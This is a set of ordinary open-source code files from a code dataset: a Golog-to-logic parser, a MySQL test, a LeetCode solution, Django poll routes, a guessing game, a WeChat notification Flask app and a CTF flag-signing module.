univer_args_dict[each_arg]= cur_sort\n add_global_args_declear_andlist_dict(each_arg,cur_sort) # action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression main.py\n univer_args_list = [] # ?x - Ball,?y - gripper\n self.const_declare_in_andlist.update(univer_args_dict) # \n # \n self.FOL_Exp += 'ForAll(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n self.FOL_Exp = self.FOL_Exp[:-1]\n self.FOL_Exp += '],'\n self.FOL_Exp += '('# 'ForAll([x,y],(' \n group.pop(0) # ['?x','-','BlockType']\n self.Nested_list2FOLExpressionwithSituation(group[0],s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ',' \n self.FOL_Exp += ')'# 'ForAll([x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()\n elif cur == '==':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += '('+ (group[0].strip('?') + '==' + group[1].strip('?') + ','+s_i+'),')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' == \\'.')\n break\n elif cur == '!=':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += '('+ (group[0].strip('?') + '!=' + group[1].strip('?') + ','+s_i+'),')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' != \\'.')\n break\n else: # Predicates defined by users like \"clear A\"\n \n self.FOL_Exp += cur + '('\n if len(group) != 0:\n for each in group:\n self.FOL_Exp += each.strip('?') + ','\n group.clear() # above ['x','A'] --> []\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ','+s_i+'),'\n else: # zero arg predicate like\"arm-empty\"\"\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '('+s_i+'),'\n break\n else:\n raise Exception('Error Input format!')\n\n\nclass GologNode:\n def __init__(self,temptype,gologlist) -> None:\n self.type = str()\n if temptype in [':GologTest',':GologSeq',':GologOr',':GologPicksExists',':GologIfThen',':GologIfElse','and']:\n self.type = temptype\n else:\n self.type = ':GologActTerm' \n temp = gologlist[0].pop(0)\n self.ActionName = temp\n self.args = gologlist[0]\n self.situation_action_args = [] # [situation action args]\n self.set_of_s_io = set() # # set of tuple (s_i,s_o) for every nodes.built this only for the top node in classgologTree/loop_set_s_i_s_o\n \n self.const_declare_in_andlist = {} # ?arg_6,Nested_list3FOLExp().run_s\n # 
(situation input) --> (situation output)\n # Poss(s_i) == \\phi(s_i)\n # SSA:F(\\vec{x},s_output) == \\Psi_F(\\vec{x},\\delta,s_input)\n self.s_i = '' # situation input \n self.s_o = '' # situation output\n self.s_act = set() # set of tuple (situation,action) \n # self.total_pos_pre = []\n # self.total_neg_pre = []\n # self.total_pos_eff = []\n # self.total_neg_eff = []\n switch = {\n ':GologActTerm' : self.GologActTerm,\n 'and': self.LogicAnd_InGolog,\n ':GologTest' : self.GologTest , \n ':GologIfThen' : self.GologIfThen , \n ':GologIfElse' : self.GologIfElse , \n ':GologSeq' : self.GologSeq , \n ':GologOr' : self.GologOr ,\n ':GologPicksExists' : self.GologPicksExists\n }\n switch[self.type](gologlist)\n\n # ::= :GologActTerm\n def GologActTerm(self,gologlist):\n self.Actionargs = []\n for each in gologlist[0]:# [['?arg_1', 'A', '?arg_2']]\n if each[0] == '?':\n self.Actionargs.append(each[1:]) #?arg_1,A,?arg_2... \n else:\n self.Actionargs.append(each)# Exist- blockType,\n\n\n # ::= :GologTest \n def GologTest(self,cnf_in_Golog_list): \n self.andlist = cnf_in_Golog_list\n self.neg_andlist = []\n self.pos_andlist = []\n for each in self.andlist:\n if each[0] == \"not\":\n self.neg_andlist.append(each)\n else:\n self.pos_andlist.append(each) # \n\n # ::= and\n def LogicAnd_InGolog(self,cnf_in_Golog_list):\n self.andlist = cnf_in_Golog_list \n self.neg_andlist = []\n self.pos_andlist = []\n for each in self.andlist:\n if each[0] == \"not\":\n self.neg_andlist.append(each)\n else:\n self.pos_andlist.append(each) # \n\n # ::= :GologIfThen \n def GologIfThen(self,gologlist):\n self.cond = gologlist[0]\n self.thenlist = gologlist[1] # Golog-,GologExpr,,AST \n\n # ::= :GologIfElse \n def GologIfElse(self,gologlist):\n self.cond = self.LogicAnd_InGolog (gologlist[0])\n # self.ifTrue = GologActTerm(Gologlist[1]) # recursively,it also could be GologExpr,it can be GologAction at most times.\n # self.elseFalse = GologActTerm(Gologlist[2])\n self.ifTrue = gologlist[1] # Golog- \n self.elseFalse = gologlist[2] # Golog- \n\n # ::= :GologSeq \n def GologSeq(self,gologlist):\n self.GologSeqNodes = [] # \n # for each in Gologlist :\n # self.GologProgramsSeq.append(GologActTerm(each)) # Seq,\n self.GologSeqlist = gologlist # [delta_1,delta_2,...,delta_n] ,list\n # self.GologSeqNodes_init = None # [delta_1,delta_2,delta_3,...] 
==> [':GologSeq', [':GologSeq',delta_1,delta_2,], delta_3]\n # self.GologSeqNodes_tail = None # Seq[Golog1,Golog2,...]\n \n # ::= :GologOr \n def GologOr(self,gologlist):\n self.GologOrNodes = [] # \n self.GologOrlist = gologlist # Golog- Or[Golog1,Golog2,...]\n\n # ::= :GologPicksExists\n def GologPicksExists(self,gologlist):\n self.PickVars = []\n for each in gologlist[0]:\n if each[0] == '?':\n self.PickVars.append(each[1:])\n self.ExistsFormula = gologlist[1] # Golog-,\n\n def dump_golog_tree_pre(self) -> str:\n formula = \"\"\n def list_args2str(argslist):\n args2str = '['\n for each in argslist:\n args2str+=each+','\n if args2str[-1] == ',':\n args2str = args2str[:-1]\n args2str+='],'\n return args2str\n def actionlist2str(ActionName,actiontermlist,s_i):\n actiontermlist_str = 'Poss('+ActionName + '('\n if len(actiontermlist) >= 1:# ,\n for each in actiontermlist:\n if each[0] == '?':\n actiontermlist_str += each[1:] + ',' # ?x ?y\n else:\n actiontermlist_str += each + ',' # A,B,LEFT,RIGHT\n if actiontermlist_str[-1] == ',':# \n actiontermlist_str = actiontermlist_str[:-1]\n actiontermlist_str += '),'+ s_i +')'# \n return actiontermlist_str\n if self.type ==':GologActTerm':\n formula += '' + actionlist2str(self.ActionName,self.Actionargs,self.s_i) \n elif self.type == 'and':\n # print(str(self.andlist[0]))\n andlist_str,returned_const_declare_in_andlist = Nested_list2FOLExp().run_s(copy.deepcopy(self.andlist[0]),self.s_i,self.s_o)\n # if '?arg_1' in returned_const_declare_in_andlist.keys():\n # print()\n self.const_declare_in_andlist.update(returned_const_declare_in_andlist)\n # andlist_str = str(self.andlist)\n formula += ''+ andlist_str \n elif self.type == ':GologTest':\n # print(str(self.andlist[0])) #['and', ['holding', '?x'], ['not', ['above', '?x', 'A']], ['clear', '?y']]\n andlist_str,returned_const_declare_in_andlist = Nested_list2FOLExp().run_s(copy.deepcopy(self.andlist[0]),self.s_i,self.s_o)\n # if '?arg_1' in returned_const_declare_in_andlist.keys():\n # print()\n self.const_declare_in_andlist.update(returned_const_declare_in_andlist)\n # andlist_str = str(self.andlist)\n formula += ''+ andlist_str \n elif self.type == ':GologSeq': # if ;then\n temp = '' + 'And(\\n '\n for each in reversed(self.GologSeqNodes):\n temp = temp + each.dump_golog_tree_pre() + ',\\n '\n if temp[-1] == ',':\n temp = temp[:-1]\n formula += temp+')' \n elif self.type == ':GologOr':\n temp = '' + 'Or(\\n '\n for each in self.GologOrNodes:\n temp = temp + each.dump_golog_tree_pre() + ',\\n '\n if temp[-1] == ',':\n temp = temp[:-1]\n formula += temp+')' \n elif self.type == ':GologPicksExists':\n formula += '' + 'Exists('+list_args2str(self.PickVars)+'\\n '+ self.ExistsFormula.dump_golog_tree_pre() +')'\n else:\n raise Exception(\"not such \" + self.type)\n return formula\n\n \n def __str__(self) -> str:\n if self.type ==':GologActTerm':\n return'\\n'+ str(self.type) + self.ActionName + '\\nAction args is:' + str(self.Actionargs) + '\\n'\n elif self.type == 'and':\n return str(self.type) + '\\nand:\\n'+str(self.andlist)\n elif self.type == ':GologTest':\n return str(self.type) + '\\n'+str(self.andlist[0]) \n elif self.type == ':GologIfThen':\n return str(self.type) + '\\nIf:\\n'+str(self.cond) + '\\nThen do:\\n'+ str(self.thenlist) \n elif self.type == ':GologIfElse':\n return str(self.type) + '\\nIfElse:\\n'+str(self.cond) + '\\nIfTrue:\\n'+str(self.ifTrue) +'\\nElse false:\\n'+str(self.elseFalse) \n elif self.type == ':GologSeq':\n result = str(self.type) + '\\n'\n for each in 
self.GologSeqNodes:\n result = result + str(each)\n return result\n elif self.type == ':GologOr':\n result = str(self.type) + '\\n'\n for each in self.GologOrNodes:\n result = result + str(each)\n return result\n elif self.type == ':GologPicksExists':\n return str(self.type) + '\\nvars:'+str(self.PickVars)+'\\n'+ str(self.ExistsFormula)\n else:\n raise Exception(\"not such \" + self.type)\n \n def print_pre_eff(self) -> str:\n print(str(self.total_neg_pre) +'\\n'+ str(self.total_pos_pre) +'\\n'+ str(self.total_neg_eff) +'\\n'+ str(self.total_neg_eff))\n \n def set_total_pre_eff(self): # recursive for each situation\n pass \n \n\nclass GologExprTree:\n # @staticmethod\n def recursive_build_golog_tree(self,gologlist):\n \"\"\"Golog programs contains:\n :GologActTerm\n :GologIfThen\n :GologIfElse\n and\n :GologTest\n :GologSeq\n :GologOr\n :GologPicksExists\"\"\"\n temptype = gologlist.pop(0) # :GologActTerm ......\n node = GologNode(temptype,gologlist) # build the Golog Node\n # print(self.total_pos_pre)\n # print(self.total_neg_pre)\n # print(self.total_pos_eff)\n # print(self.total_neg_eff)\n if node.type ==':GologActTerm':\n # print(node.ActionName) \n # print(node.Actionargs)\n pass\n elif node.type == 'and':\n # print(node.andlist)\n # print(node.neg_andlist)\n # print(node.pos_andlist)\n pass\n elif node.type == ':GologTest':\n # print(node.andlist)\n # print(node.neg_andlist)\n # print(node.pos_andlist)\n pass\n elif node.type == ':GologIfThen':\n # print(node.cond)\n # print(node.thenlist) # list\n node.thenlist = self.recursive_build_golog_tree(node.thenlist) # class \n elif node.type == ':GologIfElse':\n # print(node.cond)\n # print(node.ifTrue)# list-->node\n node.ifTrue = self.recursive_build_golog_tree(node.ifTrue) # class \n # print(node.elseFalse)# list-->node\n node.elseFalse = self.recursive_build_golog_tree(node.elseFalse) # class \n elif node.type == ':GologSeq':\n # print(len(node.GologSeqlist))# list\n for each in node.GologSeqlist:\n node.GologSeqNodes.append(self.recursive_build_golog_tree(each)) # class \n # node.GologSeqNodes_init = node.GologSeqNodes[:-1] # [delta_1,delta_2,delta_3,...] ==> [':GologSeq', [':GologSeq',delta_1,delta_2,], delta_3]\n # node.GologSeqNodes_tail = node.GologSeqNodes[-1] # the last delta_n Golog- Seq[Golog1,Golog2,...]\n if len(node.GologSeqNodes) == 2:\n pass\n elif len(node.GologSeqNodes) > 2:\n pass\n else:\n raise Exception(\"\\'len(node.GologSeqlist) < 0\\' is not allow.\")\n elif node.type == ':GologOr':\n # print(node.GologOrlist)# list\n for each in node.GologOrlist:\n node.GologOrNodes.append( self.recursive_build_golog_tree(each) )# list of class \n elif node.type == ':GologPicksExists':\n # print(node.PickVars)\n # print(node.ExistsFormula)# list-->node\n node.ExistsFormula = self.recursive_build_golog_tree(node.ExistsFormula) # list of class \n else:\n raise Exception(\"not such \" + node.type)\n return node\n\n def loop_set_s_i_s_o(self,golog):\n output_split_id = 0# 'Or' node will split s_o into s_o_1,s_o_2,s_o_3,......\n s_id = 0 # numeric identifier for middle situation.we set s'initial situation';s_ 'goal situation'. 
ther is no 's0' here.initial is 's',goal situation is s_\n set_of_s_io = set() # # set of tuple (s_i,s_o) for every nodes.\n s_act = set() # set of tuple (situation,action) \n golog.s_i = 's_i' # s_input = 's'\n golog.s_o = 's_o' # s_output = 's_'\n golog.const_declare_in_andlist = {} # gologandlitsgolog.const_declare_in_andlist,?arg_6\n from collections import deque\n fathernode = golog\n q = deque([golog])\n # global_situation_tree_mid_act_args_number = 0 # GologExists GologTestrefinement\n situation_action_args = []# \n while len(q) > 0:\n curnode = q.pop()\n # print(curnode.type)\n \n if curnode.type ==':GologActTerm':\n # if curnode.ActionName == 'pick':\n # print()\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n set_of_s_io.add((curnode.s_i,curnode.s_o))\n if (curnode.s_i,curnode.ActionName) not in s_act: # the first see this (mid_situation,action)\n # pddlact_arg-12345... curnode.Actionargs\n s_act.add((curnode.s_i,curnode.ActionName))# \n situation_action_args.append(list((curnode.s_i,curnode.ActionName)) + curnode.Actionargs) # refinementMap\n # ,‘’, act_arg_123\n # print(curnode.ActionName)\n # print(curnode.Actionargs)\n \n elif curnode.type == 'and': # canceled\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n set_of_s_io.add((curnode.s_i,curnode.s_o))\n s_act.add((curnode.s_i,'and')) # test\n situation_action_args.append(list((curnode.s_i,':GologTest')))#!!!!!!!!!!test,“/”\n # print(curnode.andlist)\n # print(curnode.neg_andlist)\n # print(curnode.pos_andlist)\n golog.const_declare_in_andlist.update(curnode.const_declare_in_andlist)# gologandlitsgolog.const_declare_in_andlist,?arg_6\n elif curnode.type == ':GologTest':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n set_of_s_io.add((curnode.s_i,curnode.s_o))\n s_act.add((curnode.s_i,':GologTest'))\n situation_action_args.append(list((curnode.s_i,':GologTest')))\n golog.const_declare_in_andlist.update(curnode.const_declare_in_andlist) # gologandlitsgolog.const_declare_in_andlist,?arg_6\n # print(curnode.andlist)\n # print(curnode.neg_andlist)\n # print(curnode.pos_andlist)\n\n elif curnode.type == ':GologSeq':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n # print(len(curnode.GologSeqNodes))# \n curnode.GologSeqNodes[0].s_i = curnode.s_i\n curnode.GologSeqNodes[-1].s_o = curnode.s_o\n if len(curnode.GologSeqNodes) <=1:\n raise Exception('Seq must have elemnts > 1')\n elif len(curnode.GologSeqNodes) == 2:\n s_id = s_id + 1 #\n curnode.GologSeqNodes[0].s_o = 's' + str(s_id)\n curnode.GologSeqNodes[1].s_i = 's' + str(s_id)\n q.append(curnode.GologSeqNodes[0])\n q.append(curnode.GologSeqNodes[1])\n # set_of_s_io.add((curnode.GologSeqNodes[0].s_i,curnode.GologSeqNodes[0].s_o))\n # set_of_s_io.add((curnode.GologSeqNodes[1].s_i,curnode.GologSeqNodes[1].s_o))\n else:# len(curnode.GologSeqNodes) > 2\n for index in range(0,len(curnode.GologSeqNodes)):\n q.append(curnode.GologSeqNodes[index])\n if index == 0: # the first\n curnode.GologSeqNodes[index].s_o = 's' + str(s_id)\n if index == 
len(curnode.GologSeqNodes)-1: # the last\n curnode.GologSeqNodes[index].s_i = 's' + str(s_id)\n # len() > 2\n if index != 0 and index != len(curnode.GologSeqNodes)-1 : # skip the first s_i/the last s_o already assigned above\n s_id = s_id + 1 # s_1,2,3,4,\n curnode.GologSeqNodes[index].s_i = 's' + str(s_id)\n curnode.GologSeqNodes[index].s_o = 's' + str(s_id+1) # here had not changed 's_id' yet\n # set_of_s_io.add((curnode.GologSeqNodes[index].s_i,curnode.GologSeqNodes[index].s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n \n elif curnode.type == ':GologOr':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n # print(curnode.GologOrNodes) # \n for index in range(0,len(curnode.GologOrNodes)):\n q.append(curnode.GologOrNodes[index])\n output_split_id = output_split_id + 1\n curnode.GologOrNodes[index].s_i = curnode.s_i\n curnode.GologOrNodes[index].s_o = curnode.s_o + '_' + str(output_split_id)\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n \n elif curnode.type == ':GologPicksExists':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n # print(curnode.PickVars)\n # print(curnode.ExistsFormula)# \n q.append(curnode.ExistsFormula)\n else:\n raise Exception(\"not such \" + curnode.type)\n fathernode = curnode # update\n golog.set_of_s_io = set_of_s_io# set of tuple (s_i,s_o) for every nodes.\n golog.s_act = s_act # # set of tuple (situation,action) \n golog.situation_action_args = situation_action_args # [situation action args]\n\n\n","repo_name":"sysulic/AVS","sub_path":"GologProgramTree.py","file_name":"GologProgramTree.py","file_ext":"py","file_size_in_byte":35627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25067824171","text":"\"\"\"\n Test of mysql connector\n\"\"\"\n\nfrom swallow.inout.Mysqlio import Mysqlio\nfrom multiprocessing import JoinableQueue\n\ndef test_basic():\n in_queue = JoinableQueue()\n\n mysql_reader = Mysqlio('localhost','3600','test','root','') \n mysql_reader.scan_and_queue(in_queue,\"SELECT * FROM swallow\")\n\n assert in_queue.qsize() == 3\n\n res = []\n while not in_queue.empty():\n res.append(in_queue.get())\n\n expected_res = [{'id':1,'libelle':'test'},{'id':2,'libelle':'john'},{'id':3,'libelle':'woo'}]\n\n assert res == expected_res\n","repo_name":"pagesjaunes/swallow","sub_path":"test/test_mysql.py","file_name":"test_mysql.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"27934672840","text":"class TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n # 方法返回当前节点是否要删除\n def dfs(self, node, sums, limit):\n # 递归终止条件\n if not node.left and not node.right:\n return node.val + sums < limit\n # 默认左右子树都需要删除,后面如果左右节点为空时才能处理\n l_tree_del, r_tree_del = True, True\n # 递归判断左右子树是否需要删除\n if node.left:\n l_tree_del = self.dfs(node.left, node.val + sums, limit)\n if node.right:\n r_tree_del = 
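
The Nested_list2FOLExp walker in GologProgramTree.py above is easier to follow on a toy grammar. A deliberately stripped-down sketch of the same idea — recursively flattening a nested prefix list into an And(...)/Not(...)/predicate string — covering only the and/not cases of the real class (to_fol is an illustrative name):

def to_fol(expr):
    # expr is ['and', e1, e2, ...], ['not', e], or ['pred', 'arg1', ...]
    head, *rest = expr
    if head in ("and", "And"):
        return "And(" + ",".join(to_fol(e) for e in rest) + ")"
    if head in ("not", "Not"):
        return "Not(" + to_fol(rest[0]) + ")"
    args = ",".join(a.lstrip("?") for a in rest)   # strip the '?' variable marker
    return f"{head}({args})" if args else head

print(to_fol(["and", ["clear", "A"], ["not", ["holding", "?x"]]]))
# And(clear(A),Not(holding(x)))
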
self.dfs(node.right, node.val + sums, limit)\n # 需要删除则置位空\n if l_tree_del:\n node.left = None\n if r_tree_del:\n node.right = None\n # 左右子树都需要删除时,当前节点就需要删除\n return l_tree_del and r_tree_del\n\n def sufficientSubset(self, root, limit):\n root_del = self.dfs(root, 0, limit)\n if root_del:\n return None\n return root","repo_name":"linwt/nowcoder-leetcode","sub_path":"leetcode_Python/1080.根到叶路径上的不足节点.py","file_name":"1080.根到叶路径上的不足节点.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"29871669119","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"polls\"\n\nurlpatterns = [\n path('/', views.poll_detail, name='detail'),\n path('list/', views.polls_list, name='list'), \n path(\"add-poll//\", views.polls_add, name=\"add_poll\"),\n path('delete/', views.poll_delete, name=\"delete_poll\"),\n path(\"edit//\", views.polls_edit, name=\"edit_poll\"),\n path('add-choice//', views.create_choice, name='add_choice'),\n path('add-choice-clone//', views.choice_protocol, name=\"protocol_choice\"),\n path('detail/choices//', views.choices_list, name=\"list_choice\"),\n path('edit/choice//', views.choice_edit, name=\"edit_choice\"),\n path('delete/choice//', views.choice_delete, name=\"delete_choice\"),\n path('vote/start//', views.vote_start, name=\"start_vote\"),\n path('vote/view/scroll//', views.vote_scroll, name=\"scroll_view\"),\n path('vote/submit_choices/', views.submit_choices, name=\"submit_choices\"),\n path('vote/view/page//', views.vote_page, name=\"page_view\"),\n path('vote/submit_choice//', views.submit_choice, name=\"submit_choice\"),\n path('vote-edit/page/', views.vote_reset, name=\"reset_vote\"),\n path('vote-edit/scroll/', views.scroll_reset, name=\"scroll_reset\"),\n\n # Charts URLS\n path('result//', views.poll_result, name='result_poll'),\n path('result-sex//', views.poll_sex, name='result_sex'),\n\n # Table URLS\n path('results-sex-table/', views.sex_table, name='table_sex'),\n path('results-table/', views.result_table, name='table_result'),\n\n # Percent URLS\n path('result-female-percent/', views.male_percent, name='percent_male'),\n path('result-male-percent/', views.female_percent, name='percent_female'),\n path('result-percent/', views.poll_total_percent, name='percent_poll'),\n]\n","repo_name":"Alyzbane/AnalysenKompass","sub_path":"pev/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3976585865","text":"from random import randint\n\njackpot = randint(1,100)\n\npoints = 99 #He will take atleast one guess, as mentioned in rules :P\nfl = 0\n#print(jackpot)\nwhile True:\n while True:\n num = int(input(\"Your Guess Please : \"))\n if num>=1 and num<=100:\n break\n else:\n print(\"Between 1-100 Dude!\")\n if num == jackpot:\n break\n else:\n points-=1\n if points < 0:\n print(\"I can't take it anymore :'(\")\n fl = 1\n break\n diff = jackpot - num\n if diff > 25:\n print(\"Your guess is too low\")\n elif diff > 0:\n print(\"Your guess is low\")\n elif diff < -25:\n print(\"Your guess is too high\")\n else:\n print(\"Your guess is high\")\nif fl == 0: \n if points > 90:\n print(\"Bro fly to Vegas! \"+str(points)+\" Points!!\")\n elif points > 50:\n print(\"Yaa Whatever \"+str(points)+\" Points\")\n else:\n print(\"Where were we?! 
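
The pruning recursion in the sufficientSubset snippet above can be exercised on a hand-built three-node tree; a condensed standalone restatement (prune_insufficient is an illustrative name, and the node values and limit are invented):

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = self.right = None

def prune_insufficient(node, total, limit):
    # True means the subtree rooted at node carries no sufficient root-to-leaf path
    if node.left is None and node.right is None:
        return total + node.val < limit
    drop_l = prune_insufficient(node.left, total + node.val, limit) if node.left else True
    drop_r = prune_insufficient(node.right, total + node.val, limit) if node.right else True
    if drop_l:
        node.left = None
    if drop_r:
        node.right = None
    return drop_l and drop_r

root = TreeNode(1)
root.left, root.right = TreeNode(2), TreeNode(10)
print(prune_insufficient(root, 0, 5), root.left, root.right.val)  # False None 10
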
\"+str(points)+\" Points\")\n \n \n \n \n \n","repo_name":"ryuzakace/phantasmagoria","sub_path":"gog.py","file_name":"gog.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20568605488","text":"import flask\nimport markdown\nimport uuid\nimport os\nimport redis\nimport requests\nimport time\nimport re\nimport json\nwith open('cfg.json','r') as f:\n cfg=json.load(f)\n\npool=redis.ConnectionPool(host=cfg['redis_ip'],port=cfg['redis_port'],password=cfg['redis_pass'])\nredisClient=redis.StrictRedis(connection_pool=pool)\n#30天\nexpire_ms=1000*60*60*24*30\napp=flask.Flask(__name__)\nroot_path=os.path.realpath(os.path.split(__file__)[0])\n\ndef md2html(md_content):\n exts=['markdown.extensions.extra','markdown.extensions.codehilite','markdown.extensions.tables',\n 'markdown.extensions.toc']\n html=markdown.markdown(md_content,extensions=exts)\n content = flask.Markup(html)\n return content\n\n@app.route('/view/',methods=['GET'])\ndef view(id):\n mark=redisClient.get(f'{cfg[\"redis_tag\"]}{id}')\n if mark:\n content=md2html(mark.decode('utf-8'))\n html=flask.render_template('index.html',**locals())\n return html\n return None\n\n# @app.route('/save/',methods=['post','get'])\ndef save(mark):\n while True:\n id=uuid.uuid4().hex\n has=redisClient.get(f'{cfg[\"redis_tag\"]}{id}')\n if not has:\n break\n redisClient.set(f'{cfg[\"redis_tag\"]}{id}',str(mark).encode('utf-8'))\n redisClient.expire(f'{cfg[\"redis_tag\"]}{id}',expire_ms)\n return id\n\ndef digest_mark(mark):\n # 去掉markdown标签\n pattern = '[\\\\\\`\\*\\_\\[\\]\\#\\+\\-\\!\\>]'\n content = re.sub(pattern, '', mark)\n #取前150字符作为文章摘要\n return content#[:155]\n\ndef get_url(title,content):\n mark = f'###{title}\\n----\\n{content}'\n id = save(mark)\n url = f\"{cfg['base_url']}view/{id}\"\n return url\n\n@app.route('/send',methods=['post','get'])\ndef send():\n args=flask.request.args\n app_id=args.get('sendkey')\n title=args.get('text')\n content=args.get('desp')\n if not content: content=''\n\n secret = cfg['agents'].get(app_id)\n if not secret:\n return 'sendkey is invaliad, please contact with admin to check sendkey'\n #获取access_token\n token_url=\"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=%s&corpsecret=%s\"%(cfg['corp_id'],secret)\n result=requests.get(token_url)\n dict_result=result.json()\n access_token=dict_result['access_token']\n\n #生成通过post请求发送消息的url\n post_url=\"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s\"%(access_token)\n post_data={\n \"touser\":\"@all\",\n \"agentid\":app_id,\n \"msgtype\":\"textcard\",\n \"textcard\":{\n \"title\" : title,\n \"description\" : f\"
    {time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))}
    {digest_mark(content)}\",\n \"url\" : get_url(title,content),\n \"btntxt\":\"详情\"\n },\n }\n data = json.dumps(post_data,quote_keys=True)\n headers = {'content-type':'application/json','charset':'utf-8'}\n result = requests.post(post_url,data=data,headers=headers)\n return result.text,result.status_code,result.headers.items()\n\nif __name__=='__main__':\n app.debug=True\n app.run(host='0.0.0.0',port=8888)\n","repo_name":"eachout/wechat_msg","sub_path":"wechat_msg.py","file_name":"wechat_msg.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32377769869","text":"import base64\nimport binascii\nimport hashlib\nfrom hmac import compare_digest\nimport struct\nimport time\nimport zlib\n\n# Length of the MAC (in bytes)\nMAC_LEN = 9\n# Length of the payload (in bytes)\nPAYLOAD_LEN = 8\n# timestamp + team + service + payload\nDATA_LEN = 4 + 2 + 1 + PAYLOAD_LEN\n# Flag validity in seconds\nVALID = 900\n\n\ndef generate(team_net_no, service_id, secret, prefix='FLAG_', payload=None, timestamp=None):\n \"\"\"\n Generates a flag for the given arguments. This is deterministic and should always return the same\n result for the same arguments (and the same time, if no timestamp is explicitly specified).\n\n Args:\n team_net_no: Net number of the team protecting this flag\n service_id: ID of the service this flag belongs to\n payload: 8 bytes of data to store in the flag, defaults to zero-padded\n CRC32(timestamp, team, service)\n timestamp: Timestamp at which the flag expires, defaults to 15 minutes in the future\n \"\"\"\n\n if timestamp is None:\n timestamp = time.time() + VALID\n\n if team_net_no > 65535:\n raise ValueError('Team net number must fit in 16 bits')\n protected_data = struct.pack(\"!i H c\", int(timestamp), team_net_no, bytes([service_id]))\n\n if payload is None:\n payload = struct.pack(\"!I I\", zlib.crc32(protected_data), 0)\n if len(payload) != PAYLOAD_LEN:\n raise ValueError('Payload {} must be {:d} bytes long'.format(repr(payload), PAYLOAD_LEN))\n\n protected_data += payload\n mac = _gen_mac(secret, protected_data)\n\n return prefix + base64.b64encode(protected_data + mac).decode('ascii')\n\n\ndef verify(flag, secret, prefix='FLAG_'):\n \"\"\"\n Verfies flag validity and returns data from the flag.\n Will raise an appropriate exception if verification fails.\n\n Returns:\n Data from the flag as a tuple of (team, service, payload, timestamp)\n \"\"\"\n\n if not flag.startswith(prefix):\n raise InvalidFlagFormat()\n\n try:\n raw_flag = base64.b64decode(flag[len(prefix):])\n except binascii.Error:\n raise InvalidFlagFormat()\n\n try:\n protected_data, flag_mac = raw_flag[:DATA_LEN], raw_flag[DATA_LEN:]\n except IndexError:\n raise InvalidFlagFormat()\n\n mac = _gen_mac(secret, protected_data)\n if not compare_digest(mac, flag_mac):\n raise InvalidFlagMAC()\n\n timestamp, team, service = struct.unpack(\"!i H c\", protected_data[:7])\n payload = protected_data[7:]\n if time.time() - timestamp > 0:\n raise FlagExpired(time.time() - timestamp)\n\n return (int(team), int.from_bytes(service, 'big'), payload, timestamp)\n\n\ndef _gen_mac(secret, protected_data):\n\n # Keccak does not need an HMAC construction, the secret can simply be prepended\n sha3 = hashlib.sha3_256()\n sha3.update(secret)\n sha3.update(protected_data)\n return sha3.digest()[:MAC_LEN]\n\n\nclass FlagVerificationError(Exception):\n \"\"\"\n Base class for all Flag Exceptions.\n \"\"\"\n\n\nclass 
